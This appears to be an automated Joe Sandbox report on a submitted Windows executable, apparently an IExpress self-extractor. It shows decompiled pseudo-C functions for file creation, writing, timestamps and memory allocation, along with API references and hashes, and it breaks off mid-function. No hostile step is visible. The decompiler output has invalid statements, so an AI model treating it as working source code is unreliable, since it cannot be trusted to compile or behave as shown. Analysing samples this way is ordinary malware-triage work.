                                                                        0x00a34e7d
                                                                        0x00000000
                                                                        0x00a34e7d
                                                                        0x00a34d25
                                                                        0x00a34d25
                                                                        0x00a34d28
                                                                        0x00a34d36
                                                                        0x00a34d3b
                                                                        0x00a34d40
                                                                        0x00a34d40
                                                                        0x00a34d42
                                                                        0x00a34d43
                                                                        0x00a34d43
                                                                        0x00a34d47
                                                                        0x00a34d4a
                                                                        0x00a34d4a
                                                                        0x00a34d4c
                                                                        0x00a34d4f
                                                                        0x00a34d4f
                                                                        0x00a34d51
                                                                        0x00a34d52
                                                                        0x00a34d52
                                                                        0x00a34d56
                                                                        0x00a34d5b
                                                                        0x00a34d5d
                                                                        0x00a34d62
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a34d67
                                                                        0x00a34d6f
                                                                        0x00a34d74
                                                                        0x00a34d76
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a34d7c
                                                                        0x00a34d84
                                                                        0x00a34d89
                                                                        0x00a34d8b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a34d94
                                                                        0x00a34d99
                                                                        0x00a34d9e
                                                                        0x00a34da1
                                                                        0x00a34daa
                                                                        0x00a34daa
                                                                        0x00a34da3
                                                                        0x00a34da3
                                                                        0x00a34da3
                                                                        0x00a34db5
                                                                        0x00a34dbb
                                                                        0x00a34dbd
                                                                        0x00000000
                                                                        0x00a34dc3
                                                                        0x00a34dc5
                                                                        0x00000000
                                                                        0x00a34dc5
                                                                        0x00a34dbd
                                                                        0x00a34d2a
                                                                        0x00a34d2a
                                                                        0x00a34d2d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a34d2d
                                                                        0x00a34cf8
                                                                        0x00a34cfd
                                                                        0x00a34d02
                                                                        0x00000000

                                                                        APIs
                                                                        • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00A34DB5
                                                                        • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00A34DDD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFileItemText
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                                                                        • API String ID: 3625706803-1955631000
                                                                        • Opcode ID: 8f4992df8ed82c7b567f136e6c77c0bd022d4e3be7ade3c01332827e9c79869e
                                                                        • Instruction ID: 21c6aa3406c905c17654ec57b9030c88ea6df662aafad7480162875ca539d8e9
                                                                        • Opcode Fuzzy Hash: 8f4992df8ed82c7b567f136e6c77c0bd022d4e3be7ade3c01332827e9c79869e
                                                                        • Instruction Fuzzy Hash: CB4134362002019BCB259F38DE446F6B7A5FB4D780F148668F88297695DF31FE8AC750
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00A34C37(signed int __ecx, int __edx, int _a4) {
                                                                        				struct _FILETIME _v12;
                                                                        				struct _FILETIME _v20;
                                                                        				FILETIME* _t14;
                                                                        				int _t15;
                                                                        				signed int _t21;
                                                                        
                                                                        				_t21 = __ecx * 0x18;
                                                                        				if( *((intOrPtr*)(_t21 + 0xa38d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                        					L5:
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t14 =  &_v12;
                                                                        					_t15 = SetFileTime( *(_t21 + 0xa38d74), _t14, _t14, _t14); // executed
                                                                        					if(_t15 == 0) {
                                                                        						goto L5;
                                                                        					}
                                                                        					return 1;
                                                                        				}
                                                                        			}








                                                                        0x00a34c40
                                                                        0x00a34c4a
                                                                        0x00a34c8d
                                                                        0x00000000
                                                                        0x00a34c70
                                                                        0x00a34c70
                                                                        0x00a34c7e
                                                                        0x00a34c86
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a34c8a

                                                                        APIs
                                                                        • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00A34C54
                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A34C66
                                                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 00A34C7E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Time$File$DateLocal
                                                                        • String ID:
                                                                        • API String ID: 2071732420-0
                                                                        • Opcode ID: 1584af4d48858c2f2b8909357e301084db43df6e761b5d45d7143f0c201544e9
                                                                        • Instruction ID: 112f697370d9128401cf0cd93ce58b7db0fbbdec97dd125768706a4dbe60da80
                                                                        • Opcode Fuzzy Hash: 1584af4d48858c2f2b8909357e301084db43df6e761b5d45d7143f0c201544e9
                                                                        • Instruction Fuzzy Hash: 2AF0907260121CAF9B64DFB4CC49DBBB7BCEB18240B44052AB855C1050EA30E914D7A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 75%
                                                                        			E00A3487A(CHAR* __ecx, signed int __edx) {
                                                                        				void* _t7;
                                                                        				CHAR* _t11;
                                                                        				long _t18;
                                                                        				long _t23;
                                                                        
                                                                        				_t11 = __ecx;
                                                                        				asm("sbb edi, edi");
                                                                        				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                        				if((__edx & 0x00000100) == 0) {
                                                                        					asm("sbb esi, esi");
                                                                        					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                        				} else {
                                                                        					if((__edx & 0x00000400) == 0) {
                                                                        						asm("sbb esi, esi");
                                                                        						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                        					} else {
                                                                        						_t23 = 1;
                                                                        					}
                                                                        				}
                                                                        				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                        				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                        					return _t7;
                                                                        				} else {
                                                                        					E00A3490C(_t11);
                                                                        					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                        				}
                                                                        			}







                                                                        0x00a34880
                                                                        0x00a3488c
                                                                        0x00a34894
                                                                        0x00a348a0
                                                                        0x00a348c9
                                                                        0x00a348ce
                                                                        0x00a348a2
                                                                        0x00a348a8
                                                                        0x00a348b7
                                                                        0x00a348bc
                                                                        0x00a348aa
                                                                        0x00a348ac
                                                                        0x00a348ac
                                                                        0x00a348a8
                                                                        0x00a348de
                                                                        0x00a348e7
                                                                        0x00a3490b
                                                                        0x00a348ee
                                                                        0x00a348f0
                                                                        0x00000000
                                                                        0x00a34902

                                                                        APIs
                                                                        • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00A34A23,?,00A34F67,*MEMCAB,00008000,00000180), ref: 00A348DE
                                                                        • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00A34F67,*MEMCAB,00008000,00000180), ref: 00A34902
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 2cadfed00c3c848edd79466b6fec4fab58c107dd3e9fbec9e07fd4193047e769
                                                                        • Instruction ID: aeb856c2fc61e3a9bc25067aa9179872beace703b199420e26dfc40ef8775f7d
                                                                        • Opcode Fuzzy Hash: 2cadfed00c3c848edd79466b6fec4fab58c107dd3e9fbec9e07fd4193047e769
                                                                        • Instruction Fuzzy Hash: E1016DA3E1167026F32481694C88FB7955CCBDA734F1B0334BDEAE71D1D5646C0481E0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E00A34AD0(signed int _a4, void* _a8, long _a12) {
                                                                        				signed int _t9;
                                                                        				int _t12;
                                                                        				signed int _t14;
                                                                        				signed int _t15;
                                                                        				void* _t20;
                                                                        				struct HWND__* _t21;
                                                                        				signed int _t24;
                                                                        				signed int _t25;
                                                                        
                                                                        				_t20 =  *0xa3858c; // 0x268
                                                                        				_t9 = E00A33680(_t20);
                                                                        				if( *0xa391d8 == 0) {
                                                                        					_push(_t24);
                                                                        					_t12 = WriteFile( *(0xa38d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                        					if(_t12 != 0) {
                                                                        						_t25 = _a12;
                                                                        						if(_t25 != 0xffffffff) {
                                                                        							_t14 =  *0xa39400; // 0x9ba00
                                                                        							_t15 = _t14 + _t25;
                                                                        							 *0xa39400 = _t15;
                                                                        							if( *0xa38184 != 0) {
                                                                        								_t21 =  *0xa38584; // 0x0
                                                                        								if(_t21 != 0) {
                                                                        									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xa393f8, 0);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						_t25 = _t24 | 0xffffffff;
                                                                        					}
                                                                        					return _t25;
                                                                        				} else {
                                                                        					return _t9 | 0xffffffff;
                                                                        				}
                                                                        			}











                                                                        0x00a34ad5
                                                                        0x00a34adb
                                                                        0x00a34ae7
                                                                        0x00a34aee
                                                                        0x00a34b05
                                                                        0x00a34b0d
                                                                        0x00a34b14
                                                                        0x00a34b1a
                                                                        0x00a34b1c
                                                                        0x00a34b21
                                                                        0x00a34b2a
                                                                        0x00a34b2f
                                                                        0x00a34b31
                                                                        0x00a34b39
                                                                        0x00a34b54
                                                                        0x00a34b54
                                                                        0x00a34b39
                                                                        0x00a34b2f
                                                                        0x00a34b0f
                                                                        0x00a34b0f
                                                                        0x00a34b0f
                                                                        0x00a34b5e
                                                                        0x00a34ae9
                                                                        0x00a34aed
                                                                        0x00a34aed

                                                                        APIs
                                                                          • Part of subcall function 00A33680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00A3369F
                                                                          • Part of subcall function 00A33680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A336B2
                                                                          • Part of subcall function 00A33680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A336DA
                                                                        • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00A34B05
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                        • String ID:
                                                                        • API String ID: 1084409-0
                                                                        • Opcode ID: 0acca642aae9a4bc6087e423d8c65a0743443147d9e5289173c2530183e0df87
                                                                        • Instruction ID: a09daadce4c65da1598fd3b36768a6f644600caf564bc9c51a550ea0407c2ea9
                                                                        • Opcode Fuzzy Hash: 0acca642aae9a4bc6087e423d8c65a0743443147d9e5289173c2530183e0df87
                                                                        • Instruction Fuzzy Hash: 4C015E31200315ABDB14CFA8DC05BA6B769FB48725F148265F9799B1F0CBB4E952CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00A3658A(char* __ecx, void* __edx, char* _a4) {
                                                                        				intOrPtr _t4;
                                                                        				char* _t6;
                                                                        				char* _t8;
                                                                        				void* _t10;
                                                                        				void* _t12;
                                                                        				char* _t16;
                                                                        				intOrPtr* _t17;
                                                                        				void* _t18;
                                                                        				char* _t19;
                                                                        
                                                                        				_t16 = __ecx;
                                                                        				_t10 = __edx;
                                                                        				_t17 = __ecx;
                                                                        				_t1 = _t17 + 1; // 0xa38b3f
                                                                        				_t12 = _t1;
                                                                        				do {
                                                                        					_t4 =  *_t17;
                                                                        					_t17 = _t17 + 1;
                                                                        				} while (_t4 != 0);
                                                                        				_t18 = _t17 - _t12;
                                                                        				_t2 = _t18 + 1; // 0xa38b40
                                                                        				if(_t2 < __edx) {
                                                                        					_t19 = _t18 + __ecx;
                                                                        					if(_t19 > __ecx) {
                                                                        						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                        						if( *_t8 != 0x5c) {
                                                                        							 *_t19 = 0x5c;
                                                                        							_t19 =  &(_t19[1]);
                                                                        						}
                                                                        					}
                                                                        					_t6 = _a4;
                                                                        					 *_t19 = 0;
                                                                        					while( *_t6 == 0x20) {
                                                                        						_t6 = _t6 + 1;
                                                                        					}
                                                                        					return E00A316B3(_t16, _t10, _t6);
                                                                        				}
                                                                        				return 0x8007007a;
                                                                        			}












                                                                        0x00a36592
                                                                        0x00a36594
                                                                        0x00a36596
                                                                        0x00a36598
                                                                        0x00a36598
                                                                        0x00a3659b
                                                                        0x00a3659b
                                                                        0x00a3659d
                                                                        0x00a3659e
                                                                        0x00a365a2
                                                                        0x00a365a4
                                                                        0x00a365a9
                                                                        0x00a365b2
                                                                        0x00a365b6
                                                                        0x00a365ba
                                                                        0x00a365c3
                                                                        0x00a365c5
                                                                        0x00a365c8
                                                                        0x00a365c8
                                                                        0x00a365c3
                                                                        0x00a365c9
                                                                        0x00a365cc
                                                                        0x00a365d2
                                                                        0x00a365d1
                                                                        0x00a365d1
                                                                        0x00000000
                                                                        0x00a365dc
                                                                        0x00000000

                                                                        APIs
                                                                        • CharPrevA.USER32(00A38B3E,00A38B3F,00000001,00A38B3E,-00000003,?,00A360EC,00A31140,?), ref: 00A365BA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CharPrev
                                                                        • String ID:
                                                                        • API String ID: 122130370-0
                                                                        • Opcode ID: b93d405ec6030b210af468c066d6ee1f6b236698dd0409cf49eeffc116e67a2b
                                                                        • Instruction ID: a43f94bbe739622e3b0a038220014ad511874cc6dcde59b1f531f3483b27762e
                                                                        • Opcode Fuzzy Hash: b93d405ec6030b210af468c066d6ee1f6b236698dd0409cf49eeffc116e67a2b
                                                                        • Instruction Fuzzy Hash: 2DF0FC32504250BBD7314A1E9C84BA6BFDE9BD6350F28817EF8DAC3245DB659C4683A4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E00A3621E() {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				signed int _t5;
                                                                        				void* _t9;
                                                                        				void* _t13;
                                                                        				void* _t19;
                                                                        				void* _t20;
                                                                        				signed int _t21;
                                                                        
                                                                        				_t5 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t5 ^ _t21;
                                                                        				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                        					0x4f0 = 2;
                                                                        					_t9 = E00A3597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                        				} else {
                                                                        					E00A344B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                        					 *0xa39124 = E00A36285();
                                                                        					_t9 = 0;
                                                                        				}
                                                                        				return E00A36CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                        			}











                                                                        0x00a36229
                                                                        0x00a36230
                                                                        0x00a36247
                                                                        0x00a3626a
                                                                        0x00a36272
                                                                        0x00a36249
                                                                        0x00a36255
                                                                        0x00a3625f
                                                                        0x00a36264
                                                                        0x00a36264
                                                                        0x00a36284

                                                                        APIs
                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00A3623F
                                                                          • Part of subcall function 00A344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A34518
                                                                          • Part of subcall function 00A344B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 00A34554
                                                                          • Part of subcall function 00A36285: GetLastError.KERNEL32(00A35BBC), ref: 00A36285
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                        • String ID:
                                                                        • API String ID: 381621628-0
                                                                        • Opcode ID: c3db43121f1a233acf4f61152fb10c6adccf61d7763387d4624bbab593b32d3e
                                                                        • Instruction ID: e6cf93533d53cb4f03fa80fc51c390aef813a5a714195f640acc863f3d5db0c8
                                                                        • Opcode Fuzzy Hash: c3db43121f1a233acf4f61152fb10c6adccf61d7763387d4624bbab593b32d3e
                                                                        • Instruction Fuzzy Hash: FFF0E2B0B00208BBE790EBB49E06FFF73BCDB54300F41806AB9C6D6092EEB49D458650
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00A34B60(signed int _a4) {
                                                                        				signed int _t9;
                                                                        				signed int _t15;
                                                                        
                                                                        				_t15 = _a4 * 0x18;
                                                                        				if( *((intOrPtr*)(_t15 + 0xa38d64)) != 1) {
                                                                        					_t9 = FindCloseChangeNotification( *(_t15 + 0xa38d74)); // executed
                                                                        					if(_t9 == 0) {
                                                                        						return _t9 | 0xffffffff;
                                                                        					}
                                                                        					 *((intOrPtr*)(_t15 + 0xa38d60)) = 1;
                                                                        					return 0;
                                                                        				}
                                                                        				 *((intOrPtr*)(_t15 + 0xa38d60)) = 1;
                                                                        				 *((intOrPtr*)(_t15 + 0xa38d68)) = 0;
                                                                        				 *((intOrPtr*)(_t15 + 0xa38d70)) = 0;
                                                                        				 *((intOrPtr*)(_t15 + 0xa38d6c)) = 0;
                                                                        				return 0;
                                                                        			}





                                                                        0x00a34b66
                                                                        0x00a34b74
                                                                        0x00a34b98
                                                                        0x00a34ba0
                                                                        0x00000000
                                                                        0x00a34bac
                                                                        0x00a34ba4
                                                                        0x00000000
                                                                        0x00a34ba4
                                                                        0x00a34b78
                                                                        0x00a34b7e
                                                                        0x00a34b84
                                                                        0x00a34b8a
                                                                        0x00000000

                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00A34FA1,00000000), ref: 00A34B98
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: 4ff1655d9fffdb74fd5a6c25e1a1656c9337d5ba336e49b9637cb3d5d4c982c4
                                                                        • Instruction ID: b094502530771c19a750b2d3098c1f000308e6e004d9eb3e03f01d9c07eeaac1
                                                                        • Opcode Fuzzy Hash: 4ff1655d9fffdb74fd5a6c25e1a1656c9337d5ba336e49b9637cb3d5d4c982c4
                                                                        • Instruction Fuzzy Hash: 80F01231500B089E9BB1CF39DC00652FBE4AEB53E0750092EB4AED2190DB34A441CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00A366AE(CHAR* __ecx) {
                                                                        				unsigned int _t1;
                                                                        
                                                                        				_t1 = GetFileAttributesA(__ecx); // executed
                                                                        				if(_t1 != 0xffffffff) {
                                                                        					return  !(_t1 >> 4) & 0x00000001;
                                                                        				} else {
                                                                        					return 0;
                                                                        				}
                                                                        			}




                                                                        0x00a366b1
                                                                        0x00a366ba
                                                                        0x00a366c7
                                                                        0x00a366bc
                                                                        0x00a366be
                                                                        0x00a366be

                                                                        APIs
                                                                        • GetFileAttributesA.KERNELBASE(?,00A34777,?,00A34E38,?), ref: 00A366B1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: 61c958e10bd48c2464274b505385b814520a4e36f326ecab458279d54c6a7af8
                                                                        • Instruction ID: 65b826e482e23f087022dae242e33d50f8c3503d52b270528f7bcf44a395f5d4
                                                                        • Opcode Fuzzy Hash: 61c958e10bd48c2464274b505385b814520a4e36f326ecab458279d54c6a7af8
                                                                        • Instruction Fuzzy Hash: 76B09276222450536A2847B26C2A5562945A6D223ABE45B90F032C11E0CB3EC846D004
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00A34CA0(long _a4) {
                                                                        				void* _t2;
                                                                        
                                                                        				_t2 = GlobalAlloc(0, _a4); // executed
                                                                        				return _t2;
                                                                        			}




                                                                        0x00a34caa
                                                                        0x00a34cb1

                                                                        APIs
                                                                        • GlobalAlloc.KERNELBASE(00000000,?), ref: 00A34CAA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: AllocGlobal
                                                                        • String ID:
                                                                        • API String ID: 3761449716-0
                                                                        • Opcode ID: 3383856957890dd06a935cd8b46ed20d2a8d9ff3425be666a65cf2b1340a624a
                                                                        • Instruction ID: 02619468482ad66483a40bfc0266233552248266084a25b072c0400ba1b6cdbe
                                                                        • Opcode Fuzzy Hash: 3383856957890dd06a935cd8b46ed20d2a8d9ff3425be666a65cf2b1340a624a
                                                                        • Instruction Fuzzy Hash: 38B0123204430CB7CF001FC2EC09F853F1DE7C5761F140000F60C454508A7294118696
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00A34CC0(void* _a4) {
                                                                        				void* _t2;
                                                                        
                                                                        				_t2 = GlobalFree(_a4); // executed
                                                                        				return _t2;
                                                                        			}




                                                                        0x00a34cc8
                                                                        0x00a34ccf

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: FreeGlobal
                                                                        • String ID:
                                                                        • API String ID: 2979337801-0
                                                                        • Opcode ID: fff75fec1e375629f319856502097145831d81d9a772cb2a53f28ca9b652c85f
                                                                        • Instruction ID: bf1654b46270c6ae6be505e4dd276d79c0e3f4c1f3730483a3b610fa2abe6c18
                                                                        • Opcode Fuzzy Hash: fff75fec1e375629f319856502097145831d81d9a772cb2a53f28ca9b652c85f
                                                                        • Instruction Fuzzy Hash: B5B0123100010CB78F001B82EC088453F1DD6D12607000010F50C414218B3398128585
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 92%
                                                                        			E00A35C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				CHAR* _v265;
                                                                        				char _v266;
                                                                        				char _v267;
                                                                        				char _v268;
                                                                        				CHAR* _v272;
                                                                        				char _v276;
                                                                        				signed int _v296;
                                                                        				char _v556;
                                                                        				signed int _t61;
                                                                        				int _t63;
                                                                        				char _t67;
                                                                        				CHAR* _t69;
                                                                        				signed int _t71;
                                                                        				void* _t75;
                                                                        				char _t79;
                                                                        				void* _t83;
                                                                        				void* _t85;
                                                                        				void* _t87;
                                                                        				intOrPtr _t88;
                                                                        				void* _t100;
                                                                        				intOrPtr _t101;
                                                                        				CHAR* _t104;
                                                                        				intOrPtr _t105;
                                                                        				void* _t111;
                                                                        				void* _t115;
                                                                        				CHAR* _t118;
                                                                        				void* _t119;
                                                                        				void* _t127;
                                                                        				CHAR* _t129;
                                                                        				void* _t132;
                                                                        				void* _t142;
                                                                        				signed int _t143;
                                                                        				CHAR* _t144;
                                                                        				void* _t145;
                                                                        				void* _t146;
                                                                        				void* _t147;
                                                                        				void* _t149;
                                                                        				char _t155;
                                                                        				void* _t157;
                                                                        				void* _t162;
                                                                        				void* _t163;
                                                                        				char _t167;
                                                                        				char _t170;
                                                                        				CHAR* _t173;
                                                                        				void* _t177;
